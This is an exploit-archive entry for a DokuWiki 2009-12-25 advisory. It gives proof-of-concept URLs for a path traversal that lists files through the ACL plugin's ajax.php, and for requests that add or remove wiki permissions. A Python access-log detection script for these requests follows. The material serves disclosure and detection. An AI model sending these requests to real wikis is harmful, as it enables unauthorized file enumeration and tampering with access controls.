dokuwiki 2009-12-25 Multiple Vulnerabilities

2010-01-14T00:00:00
ID 1337DAY-ID-10673
Type zdt
Reporter IHTeam
Modified 2010-01-14T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
============================================
dokuwiki 2009-12-25 Multiple Vulnerabilities
============================================

--------------------  Show Outside Directory
 
PoC :
 
     http://server/plugins/acl/ajax.php?ajax=tree&ns=../pages/
 
     The bug allows listing the names of arbitrary files on the webserver,
     NOT THEIR CONTENTS.
 
 
--------------------  Arbitrary Change or Delete Wiki Permission
 
PoC :
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[save]=1&acl=(ACL)
 
             Adds a read or write authorization to acl.auth.php.
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[del]=1&acl=(ACL)
             Deletes an authorization like (ACL) from acl.auth.php, if one exists.
 
      
http://server/lib/plugins/acl/ajax.php?ajax=info&id=wiki&[email protected]&cmd[update]=1&acl=(ACL)
             Deletes all authorizations like (ACL) from acl.auth.php.
 
     where (ACL) must be:
          1 -> read
          2 -> modified
          4 -> creation
          8 -> upload
         16 -> delete
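
Both request patterns above are visible in web server access logs. The following detection sketch is an added example, not part of the original advisory: it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Permission bits exactly as listed in the advisory's (ACL) table.
ACL_BITS = {1: "read", 2: "modified", 4: "creation", 8: "upload", 16: "delete"}
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_acl(value):
    """Names of the permissions set in an acl= bitmask ([] if not numeric)."""
    if not (value.isascii() and value.isdigit()):
        return []
    return [name for bit, name in ACL_BITS.items() if int(value) & bit]

def classify(log_line):
    """Finding dict for a request matching either advisory pattern, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.endswith("/plugins/acl/ajax.php"):
        return None
    qs = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes
    ajax = qs.get("ajax", [""])[0]
    traversal = [ns for ns in qs.get("ns", []) if ".." in ns]
    if ajax == "tree" and traversal:
        return {"kind": "namespace-traversal", "ns": traversal[0]}
    if ajax == "info":
        for cmd in ("save", "del", "update"):
            if f"cmd[{cmd}]" in qs:
                return {"kind": f"acl-{cmd}", "id": qs.get("id", [""])[0],
                        "perms": decode_acl(qs.get("acl", [""])[0])}
    return None

def scan(lines):
    """(line number, finding) for every log line that matches."""
    return [(n, f) for n, line in enumerate(lines, 1) if (f := classify(line))]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Jan/2010:10:00:01 +0000] "GET /lib/plugins/acl/ajax.php?ajax=tree&ns=..%2Fpages%2F HTTP/1.1" 200 512',
    '192.0.2.10 - - [14/Jan/2010:10:00:05 +0000] "GET /lib/plugins/acl/ajax.php?ajax=info&id=wiki&cmd%5Bsave%5D=1&acl=3 HTTP/1.1" 200 340',
    '198.51.100.7 - - [14/Jan/2010:10:01:00 +0000] "GET /doku.php?id=start HTTP/1.1" 200 4096',
    '198.51.100.7 - - [14/Jan/2010:10:01:09 +0000] "GET /lib/plugins/acl/ajax.php?ajax=tree&ns=wiki HTTP/1.1" 200 220',
]

if __name__ == "__main__":
    for lineno, finding in scan(SAMPLE_LOG):
        print(lineno, finding)
```

A match only shows that the request was made; parameters sent in a POST body do not appear in an access log, so this covers the GET form shown in the PoC URLs.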





#  0day.today [2018-01-02]  #